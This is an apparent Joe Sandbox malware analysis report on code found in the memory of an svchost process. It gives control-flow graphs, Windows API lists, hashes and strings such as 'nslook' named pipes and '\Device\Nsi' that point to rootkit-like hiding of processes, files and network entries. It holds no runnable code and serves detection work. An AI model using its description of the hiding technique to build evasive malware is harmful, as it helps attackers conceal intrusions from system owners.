PathCombineW 264->277 266->250 273->236 287 1b8bff42cfe-1b8bff42d16 call 1b8bff43b00 273->287 274->275 288 1b8bff42f4c-1b8bff42f4f 274->288 289 1b8bff42eaa-1b8bff42ec1 lstrcpyW lstrcatW 275->289 290 1b8bff42ec3-1b8bff42ecc PathCombineW 275->290 281 1b8bff42c33-1b8bff42c3d 276->281 277->281 285 1b8bff42fa4 281->285 286 1b8bff42c43-1b8bff42c4a 281->286 285->236 286->285 291 1b8bff42c50-1b8bff42c55 286->291 306 1b8bff42d18-1b8bff42d2f call 1b8bff4a610 287->306 307 1b8bff42d35-1b8bff42d6e call 1b8bff43b00 lstrcmpiW 287->307 293 1b8bff42f71-1b8bff42f74 288->293 294 1b8bff42f51-1b8bff42f6f call 1b8bff49480 288->294 295 1b8bff42ecf-1b8bff42ed9 289->295 290->295 291->285 296 1b8bff42c5b 291->296 302 1b8bff42f7d-1b8bff42f80 293->302 303 1b8bff42f76-1b8bff42f7b 293->303 305 1b8bff42f31-1b8bff42f34 294->305 299 1b8bff42edb-1b8bff42ee2 295->299 300 1b8bff42f23-1b8bff42f2e 295->300 301 1b8bff42c60-1b8bff42c71 296->301 299->300 309 1b8bff42ee4-1b8bff42ee9 299->309 300->305 310 1b8bff42c7b lstrcmpW 301->310 311 1b8bff42c73-1b8bff42c79 lstrcmpiW 301->311 302->285 304 1b8bff42f82-1b8bff42f9b 302->304 303->236 304->285 305->285 313 1b8bff42f36-1b8bff42f3e 305->313 306->273 306->307 322 1b8bff42d89-1b8bff42d92 PathCombineW 307->322 323 1b8bff42d70-1b8bff42d87 lstrcpyW lstrcatW 307->323 309->300 316 1b8bff42eeb 309->316 312 1b8bff42c81-1b8bff42c8b 310->312 311->312 318 1b8bff42c8d-1b8bff42c91 312->318 319 1b8bff42c98-1b8bff42ca7 312->319 313->257 317 1b8bff42ef0-1b8bff42f01 316->317 324 1b8bff42f0b lstrcmpW 317->324 325 1b8bff42f03-1b8bff42f09 lstrcmpiW 317->325 318->301 326 1b8bff42c93 318->326 319->273 327 1b8bff42d95-1b8bff42d9f 322->327 323->327 328 1b8bff42f11-1b8bff42f1b 324->328 325->328 326->285 327->285 329 1b8bff42da5-1b8bff42dac 327->329 330 1b8bff42f1d-1b8bff42f21 328->330 331 1b8bff42f43-1b8bff42f47 328->331 329->285 332 1b8bff42db2-1b8bff42db7 329->332 330->300 330->317 331->288 332->285 333 1b8bff42dbd 332->333 334 1b8bff42dc0-1b8bff42dd1 333->334 335 1b8bff42ddb lstrcmpW 334->335 336 1b8bff42dd3-1b8bff42dd9 lstrcmpiW 334->336 337 1b8bff42de1-1b8bff42deb 335->337 336->337 337->319 338 1b8bff42df1-1b8bff42df5 337->338 338->334 339 1b8bff42df7 338->339 339->285
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: cb3dc28ea3c4a4d2d026e485507e44396be361c5efe6bcf43255f04362c8f0a1
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: 36F1AD32700B828AEB24AF35EA903D977A8F788F94F544025DA4967F98DF3AD549C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF433C0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 370stringlibraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 340 1b8bff433c0-1b8bff4343c call 1b8bff60ce0 343 1b8bff43956-1b8bff43975 call 1b8bff483e0 340->343 344 1b8bff43442-1b8bff43448 340->344 344->343 345 1b8bff4344e-1b8bff43451 344->345 345->343 347 1b8bff43457-1b8bff4345a 345->347 347->343 349 1b8bff43460-1b8bff43470 GetModuleHandleA 347->349 350 1b8bff43482-1b8bff434a1 349->350 351 1b8bff43472-1b8bff4347c GetProcAddress 349->351 350->343 353 1b8bff434a7-1b8bff434c0 call 1b8bff4a610 350->353 351->350 353->343 356 1b8bff434c6-1b8bff434d5 353->356 357 1b8bff4394e 356->357 358 1b8bff434db-1b8bff434e6 356->358 357->343 358->357 359 1b8bff434ec-1b8bff4350c 358->359 360 1b8bff4393a-1b8bff43946 359->360 361 1b8bff43512-1b8bff43519 359->361 360->357 362 1b8bff43520-1b8bff4352f 361->362 363 1b8bff43535-1b8bff43538 362->363 364 1b8bff436d0-1b8bff436d3 362->364 365 1b8bff435b9-1b8bff435bc 363->365 366 1b8bff4353a-1b8bff43558 OpenProcess 363->366 367 1b8bff43929-1b8bff43934 364->367 368 1b8bff436d9-1b8bff436dc 364->368 369 1b8bff435be-1b8bff435ca 365->369 370 1b8bff43633-1b8bff43636 365->370 371 1b8bff4355a-1b8bff43575 K32GetModuleFileNameExW 366->371 372 1b8bff435b2 366->372 367->360 367->362 373 1b8bff4375c-1b8bff4375f 368->373 374 1b8bff436de-1b8bff436fb OpenProcess 368->374 375 1b8bff435cc-1b8bff435e0 369->375 376 1b8bff435f6-1b8bff435f9 369->376 379 1b8bff43638-1b8bff4363b 370->379 380 1b8bff43672-1b8bff43675 370->380 381 1b8bff435a9-1b8bff435ac CloseHandle 371->381 382 1b8bff43577-1b8bff43596 PathFindFileNameW lstrlenW 371->382 372->365 377 1b8bff43761-1b8bff4376d 373->377 378 1b8bff437a3-1b8bff437a6 373->378 383 1b8bff436fd-1b8bff43718 K32GetModuleFileNameExW 374->383 384 1b8bff43755 374->384 387 1b8bff435e3-1b8bff435e9 375->387 376->370 389 1b8bff435fb-1b8bff43607 376->389 377->378 388 1b8bff4376f-1b8bff43786 377->388 390 1b8bff437a8-1b8bff437ab 378->390 391 1b8bff437e2-1b8bff437e5 378->391 386 1b8bff43837-1b8bff43853 call 1b8bff4a610 379->386 392 1b8bff43641-1b8bff4364c 379->392 385 1b8bff4367b-1b8bff43684 380->385 380->386 381->372 382->381 393 1b8bff43598-1b8bff435a3 lstrcpyW 382->393 394 1b8bff4374c-1b8bff4374f CloseHandle 383->394 395 1b8bff4371a-1b8bff43739 PathFindFileNameW lstrlenW 383->395 384->373 385->386 396 1b8bff4368a 385->396 417 1b8bff43859 386->417 418 1b8bff43922 386->418 397 1b8bff435ef-1b8bff435f4 387->397 398 1b8bff43860-1b8bff4386d 387->398 399 1b8bff43790-1b8bff43796 388->399 389->370 401 1b8bff43609-1b8bff4361d 389->401 390->386 402 1b8bff437b1-1b8bff437bc 390->402 391->386 403 1b8bff437e7-1b8bff437f0 391->403 392->380 404 1b8bff4364e-1b8bff4365d 392->404 393->381 394->384 395->394 405 1b8bff4373b-1b8bff43746 lstrcpyW 395->405 406 1b8bff43690-1b8bff436a6 396->406 397->376 397->387 410 1b8bff4391a-1b8bff43920 398->410 411 1b8bff43873-1b8bff4387a 398->411 399->398 407 1b8bff4379c-1b8bff437a1 399->407 409 1b8bff43620-1b8bff43626 401->409 402->391 412 1b8bff437be-1b8bff437cc 402->412 403->386 413 1b8bff437f2-1b8bff437f6 403->413 414 1b8bff43660-1b8bff43666 404->414 405->394 415 1b8bff436a8-1b8bff436ae lstrcmpiW 406->415 416 1b8bff436b0 lstrcmpW 406->416 407->378 407->399 409->398 419 1b8bff4362c-1b8bff43631 409->419 410->367 420 1b8bff4387c-1b8bff43887 411->420 421 1b8bff43889-1b8bff4388c 411->421 422 1b8bff437d0-1b8bff437d6 412->422 423 1b8bff43800-1b8bff43816 413->423 414->398 424 1b8bff4366c-1b8bff43670 414->424 425 1b8bff436b6-1b8bff436bf 415->425 416->425 417->398 418->367 419->370 419->409 426 1b8bff43899-1b8bff438aa call 1b8bff49480 420->426 428 1b8bff4388e-1b8bff43895 421->428 429 1b8bff438af-1b8bff438b7 421->429 422->398 427 1b8bff437dc-1b8bff437e0 422->427 430 1b8bff43818-1b8bff4381e lstrcmpiW 423->430 431 1b8bff43820 lstrcmpW 423->431 424->380 424->414 425->417 433 1b8bff436c5-1b8bff436c9 425->433 426->429 427->391 427->422 428->426 435 1b8bff438ef-1b8bff438f2 429->435 436 1b8bff438b9-1b8bff438ea call 1b8bff49480 429->436 432 1b8bff43826-1b8bff4382f 430->432 431->432 432->417 438 1b8bff43831-1b8bff43835 432->438 433->406 441 1b8bff436cb 433->441 439 1b8bff43918 435->439 440 1b8bff438f4-1b8bff43913 call 1b8bff49480 435->440 436->435 438->386 438->423 439->410 440->439 441->386
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 5aa5af5c47ef2683f1c9420351592a518d8a25bc05bfc994c458915122eefd5f
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: 51F1ED3670579282EB64AF26E6407EDB3A9F788F80F544026CE49A7784DF3AC854D744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF42630 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 195stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 443 1b8bff42630-1b8bff426c0 call 1b8bff60ce8 446 1b8bff4298d-1b8bff429aa call 1b8bff483e0 443->446 447 1b8bff426c6-1b8bff426ca 443->447 447->446 448 1b8bff426d0-1b8bff426de 447->448 448->446 450 1b8bff426e4-1b8bff4274a call 1b8bff49890 * 3 GetFileType 448->450 458 1b8bff4274c-1b8bff42753 450->458 459 1b8bff42755-1b8bff42771 GetFinalPathNameByHandleW 450->459 460 1b8bff427ae-1b8bff427b3 lstrcpyW 458->460 461 1b8bff427b9-1b8bff427bd 459->461 462 1b8bff42773-1b8bff4278f call 1b8bff4a610 459->462 460->461 464 1b8bff427c5-1b8bff427d0 461->464 462->461 468 1b8bff42791-1b8bff427a4 lstrlenW 462->468 466 1b8bff427ed 464->466 467 1b8bff427d2-1b8bff427eb 464->467 469 1b8bff427ef-1b8bff42805 call 1b8bff43b00 466->469 467->469 468->461 471 1b8bff427a6 468->471 474 1b8bff42824-1b8bff4285b call 1b8bff43b00 lstrcmpiW 469->474 475 1b8bff42807-1b8bff4281e call 1b8bff4a610 469->475 471->460 481 1b8bff4285d-1b8bff4287c lstrcpyW lstrcatW 474->481 482 1b8bff4287e-1b8bff42887 PathCombineW 474->482 475->474 480 1b8bff4291a-1b8bff4291c 475->480 483 1b8bff4291e-1b8bff42937 call 1b8bff49480 480->483 484 1b8bff42939-1b8bff4293c 480->484 485 1b8bff4288a-1b8bff42894 481->485 482->485 491 1b8bff428fd-1b8bff428ff 483->491 487 1b8bff4293e-1b8bff42943 484->487 488 1b8bff42945-1b8bff42949 484->488 489 1b8bff428e8-1b8bff428fa 485->489 490 1b8bff42896-1b8bff4289d 485->490 493 1b8bff4296d-1b8bff42985 487->493 494 1b8bff42969 488->494 495 1b8bff4294b-1b8bff4295d 488->495 489->491 490->489 496 1b8bff4289f-1b8bff428a3 490->496 491->494 497 1b8bff42901 491->497 493->446 494->493 495->494 496->489 498 1b8bff428a5 496->498 497->464 499 1b8bff428b0-1b8bff428c7 498->499 500 1b8bff428c9-1b8bff428cf lstrcmpiW 499->500 501 1b8bff428d1 lstrcmpW 499->501 502 1b8bff428d7-1b8bff428e0 500->502 501->502 503 1b8bff42906-1b8bff42912 502->503 504 1b8bff428e2-1b8bff428e6 502->504 503->480 504->489 504->499
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 052a65238b3bbb239cc4e42bacc6ee20b74eebe6b3f8e3e1b78403131301fba7
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: 3E9181362046C181FB60AF35EA503EE77A8F785F84F444026CA8A63B99DF3AD549CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF424F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 76filethreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 5a1eedef5d2f6dd78e6fd221f0fbcfa1c0c656bea85fb7cae13ccf6284997451
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: 29316F36604B4086EB20AF35F66479AB3A8F789FA4F550125DE5D03BA8DF3ED549CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF17AEC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 517 1b8bff17aec-1b8bff17af2 518 1b8bff17b2d-1b8bff17b37 517->518 519 1b8bff17af4-1b8bff17af7 517->519 522 1b8bff17c54-1b8bff17c69 518->522 520 1b8bff17af9-1b8bff17afc 519->520 521 1b8bff17b21-1b8bff17b60 call 1b8bff182c8 519->521 523 1b8bff17afe-1b8bff17b01 520->523 524 1b8bff17b14 __scrt_dllmain_crt_thread_attach 520->524 537 1b8bff17c2e 521->537 538 1b8bff17b66-1b8bff17b7b call 1b8bff1815c 521->538 525 1b8bff17c78-1b8bff17c92 call 1b8bff1815c 522->525 526 1b8bff17c6b 522->526 528 1b8bff17b0d-1b8bff17b12 call 1b8bff1820c 523->528 529 1b8bff17b03-1b8bff17b0c 523->529 532 1b8bff17b19-1b8bff17b20 524->532 540 1b8bff17ccb-1b8bff17cfc call 1b8bff18498 525->540 541 1b8bff17c94-1b8bff17cc9 call 1b8bff18284 call 1b8bff18124 call 1b8bff18620 call 1b8bff18438 call 1b8bff1845c call 1b8bff182b4 525->541 530 1b8bff17c6d-1b8bff17c77 526->530 528->532 542 1b8bff17c30-1b8bff17c45 537->542 549 1b8bff17b81-1b8bff17b92 call 1b8bff181cc 538->549 550 1b8bff17c46-1b8bff17c53 call 1b8bff18498 538->550 551 1b8bff17d0d-1b8bff17d13 540->551 552 1b8bff17cfe-1b8bff17d04 540->552 541->530 570 1b8bff17be3-1b8bff17bed call 1b8bff18438 549->570 571 1b8bff17b94-1b8bff17bb8 call 1b8bff185e4 call 1b8bff18114 call 1b8bff18140 call 1b8bff19d00 549->571 550->522 557 1b8bff17d5a-1b8bff17d70 call 1b8bff13320 551->557 558 1b8bff17d15-1b8bff17d1f 551->558 552->551 556 1b8bff17d06-1b8bff17d08 552->556 564 1b8bff17dfd-1b8bff17e0a 556->564 578 1b8bff17daa-1b8bff17dac 557->578 579 1b8bff17d72-1b8bff17d74 557->579 565 1b8bff17d2b-1b8bff17d39 call 1b8bff23748 558->565 566 1b8bff17d21-1b8bff17d29 558->566 567 1b8bff17d3f-1b8bff17d54 call 1b8bff17aec 565->567 581 1b8bff17df3-1b8bff17dfb 565->581 566->567 567->557 567->581 570->537 590 1b8bff17bef-1b8bff17bfb call 1b8bff18488 570->590 571->570 619 1b8bff17bba-1b8bff17bc1 __scrt_dllmain_after_initialize_c 571->619 582 1b8bff17dae-1b8bff17db1 578->582 583 1b8bff17db3-1b8bff17dc8 call 1b8bff17aec 578->583 579->581 587 1b8bff17d76-1b8bff17d98 call 1b8bff13320 call 1b8bff17c54 579->587 581->564 582->581 582->583 583->581 600 1b8bff17dca-1b8bff17dd4 583->600 587->581 614 1b8bff17d9a-1b8bff17da8 call 1b8bff23748 587->614 607 1b8bff17bfd-1b8bff17c07 call 1b8bff183a0 590->607 608 1b8bff17c21-1b8bff17c2c 590->608 605 1b8bff17ddf-1b8bff17def call 1b8bff23748 600->605 606 1b8bff17dd6-1b8bff17ddd 600->606 605->581 606->581 607->608 621 1b8bff17c09-1b8bff17c17 607->621 608->542 614->581 619->570 622 1b8bff17bc3-1b8bff17be0 call 1b8bff19c9c 619->622 621->608 622->570
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: c8ae5aca2a4f612d89ec8aedd07320126b2046e0d1eefa54b9200476324fcd40
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: D381D07271468986FF64BB79AB813EB7399A785F80F044115BB0843396EF7BCA42C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF486EC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 625 1b8bff486ec-1b8bff486f2 626 1b8bff4872d-1b8bff48737 625->626 627 1b8bff486f4-1b8bff486f7 625->627 630 1b8bff48854-1b8bff48869 626->630 628 1b8bff486f9-1b8bff486fc 627->628 629 1b8bff48721-1b8bff48760 call 1b8bff48ec8 627->629 631 1b8bff486fe-1b8bff48701 628->631 632 1b8bff48714 __scrt_dllmain_crt_thread_attach 628->632 648 1b8bff4882e 629->648 649 1b8bff48766-1b8bff4877b call 1b8bff48d5c 629->649 633 1b8bff48878-1b8bff48892 call 1b8bff48d5c 630->633 634 1b8bff4886b 630->634 636 1b8bff4870d-1b8bff48712 call 1b8bff48e0c 631->636 637 1b8bff48703-1b8bff4870c 631->637 640 1b8bff48719-1b8bff48720 632->640 646 1b8bff488cb-1b8bff488fc call 1b8bff49098 633->646 647 1b8bff48894-1b8bff488c9 call 1b8bff48e84 call 1b8bff48d24 call 1b8bff49220 call 1b8bff49038 call 1b8bff4905c call 1b8bff48eb4 633->647 638 1b8bff4886d-1b8bff48877 634->638 636->640 659 1b8bff4890d-1b8bff48913 646->659 660 1b8bff488fe-1b8bff48904 646->660 647->638 652 1b8bff48830-1b8bff48845 648->652 657 1b8bff48846-1b8bff48853 call 1b8bff49098 649->657 658 1b8bff48781-1b8bff48792 call 1b8bff48dcc 649->658 657->630 675 1b8bff48794-1b8bff487b8 call 1b8bff491e4 call 1b8bff48d14 call 1b8bff48d40 call 1b8bff4a900 658->675 676 1b8bff487e3-1b8bff487ed call 1b8bff49038 658->676 664 1b8bff4895a-1b8bff48970 call 1b8bff43f20 659->664 665 1b8bff48915-1b8bff4891f 659->665 660->659 663 1b8bff48906-1b8bff48908 660->663 671 1b8bff489fd-1b8bff48a0a 663->671 684 1b8bff489aa-1b8bff489ac 664->684 685 1b8bff48972-1b8bff48974 664->685 672 1b8bff4892b-1b8bff48939 call 1b8bff54348 665->672 673 1b8bff48921-1b8bff48929 665->673 678 1b8bff4893f-1b8bff48954 call 1b8bff486ec 672->678 692 1b8bff489f3-1b8bff489fb 672->692 673->678 675->676 728 1b8bff487ba-1b8bff487c1 __scrt_dllmain_after_initialize_c 675->728 676->648 698 1b8bff487ef-1b8bff487fb call 1b8bff49088 676->698 678->664 678->692 693 1b8bff489ae-1b8bff489b1 684->693 694 1b8bff489b3-1b8bff489c8 call 1b8bff486ec 684->694 691 1b8bff48976-1b8bff48998 call 1b8bff43f20 call 1b8bff48854 685->691 685->692 691->692 722 1b8bff4899a-1b8bff489a8 call 1b8bff54348 691->722 692->671 693->692 693->694 694->692 708 1b8bff489ca-1b8bff489d4 694->708 715 1b8bff487fd-1b8bff48807 call 1b8bff48fa0 698->715 716 1b8bff48821-1b8bff4882c 698->716 713 1b8bff489df-1b8bff489ef call 1b8bff54348 708->713 714 1b8bff489d6-1b8bff489dd 708->714 713->692 714->692 715->716 727 1b8bff48809-1b8bff48817 715->727 716->652 722->692 727->716 728->676 730 1b8bff487c3-1b8bff487e0 call 1b8bff4a89c 728->730 730->676
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 3a88d0bc714e7cab74a086d236e4b3afd088008c47020c10570fca8e2b8efe5c
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: E581CF31A04A4386FB64BB7A97913D973ACBB85F80F1441259E48A3796EF3BC845D704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF43C30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 221stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 733 1b8bff43c30-1b8bff43c54 734 1b8bff43c5a-1b8bff43c5f 733->734 735 1b8bff43db7-1b8bff43dba 733->735 736 1b8bff43efa-1b8bff43f16 734->736 738 1b8bff43c65-1b8bff43c69 734->738 735->736 737 1b8bff43dc0-1b8bff43dc5 735->737 737->736 739 1b8bff43dcb-1b8bff43dce 737->739 740 1b8bff43c70-1b8bff43c88 738->740 743 1b8bff43dd0-1b8bff43ddf 739->743 741 1b8bff43c8a-1b8bff43c9e call 1b8bff4a610 740->741 742 1b8bff43ca4-1b8bff43cab 740->742 741->742 758 1b8bff43d72-1b8bff43d9e call 1b8bff49480 741->758 747 1b8bff43cad-1b8bff43cc1 call 1b8bff4a610 742->747 748 1b8bff43cc7-1b8bff43cd4 742->748 745 1b8bff43dfb-1b8bff43e02 743->745 746 1b8bff43de1-1b8bff43df5 call 1b8bff4a610 743->746 752 1b8bff43e1e-1b8bff43e2b 745->752 753 1b8bff43e04-1b8bff43e18 call 1b8bff4a610 745->753 746->745 768 1b8bff43ec2-1b8bff43ee6 call 1b8bff49480 746->768 747->748 747->758 754 1b8bff43cd6-1b8bff43cdd 748->754 755 1b8bff43d20-1b8bff43d2e 748->755 763 1b8bff43e2d-1b8bff43e34 752->763 764 1b8bff43e70-1b8bff43e7e 752->764 753->752 753->768 754->755 762 1b8bff43cdf-1b8bff43ce3 754->762 756 1b8bff43d30-1b8bff43d37 755->756 757 1b8bff43da1-1b8bff43dac 755->757 756->757 765 1b8bff43d39-1b8bff43d3d 756->765 757->740 773 1b8bff43db2 757->773 758->757 762->755 770 1b8bff43ce5 762->770 763->764 772 1b8bff43e36-1b8bff43e3a 763->772 766 1b8bff43ee9-1b8bff43ef4 764->766 767 1b8bff43e80-1b8bff43e87 764->767 765->757 774 1b8bff43d3f 765->774 766->736 766->743 767->766 775 1b8bff43e89-1b8bff43e8d 767->775 768->766 776 1b8bff43cf0-1b8bff43cff 770->776 772->764 778 1b8bff43e3c 772->778 773->736 780 1b8bff43d40-1b8bff43d4f 774->780 775->766 781 1b8bff43e8f 775->781 782 1b8bff43d09 lstrcmpW 776->782 783 1b8bff43d01-1b8bff43d07 lstrcmpiW 776->783 784 1b8bff43e40-1b8bff43e4f 778->784 786 1b8bff43d59 lstrcmpW 780->786 787 1b8bff43d51-1b8bff43d57 lstrcmpiW 780->787 788 1b8bff43e90-1b8bff43e9f 781->788 789 1b8bff43d0f-1b8bff43d18 782->789 783->789 790 1b8bff43e59 lstrcmpW 784->790 791 1b8bff43e51-1b8bff43e57 lstrcmpiW 784->791 793 1b8bff43d5f-1b8bff43d68 786->793 787->793 794 1b8bff43ea9 lstrcmpW 788->794 795 1b8bff43ea1-1b8bff43ea7 lstrcmpiW 788->795 789->758 796 1b8bff43d1a-1b8bff43d1e 789->796 792 1b8bff43e5f-1b8bff43e68 790->792 791->792 792->768 797 1b8bff43e6a-1b8bff43e6e 792->797 793->758 798 1b8bff43d6a-1b8bff43d6e 793->798 799 1b8bff43eaf-1b8bff43eb8 794->799 795->799 796->755 796->776 797->764 797->784 798->780 800 1b8bff43d70 798->800 799->768 801 1b8bff43eba-1b8bff43ebe 799->801 800->757 801->788 802 1b8bff43ec0 801->802 802->766
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: a53f7fdc902fb4f2fa91fe0d52c19dc9f861a05065ccde734e9bc8b6e64c733f
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: 3F81CE76302A5696FB54BF76E7943A973A9F740FC0F054029CA0667B90EF36E468E300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF411C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135stringregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: f8c7c4772f58d7f68e4874eb2b5f470208e57190687a01bab14a1584c3334f0d
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: C8516B72604B8187EB65EB21FA9139EB3A8F389F80F004529DB9957B59DF39D065CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF444F0 Relevance: 10.6, APIs: 7, Instructions: 125threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
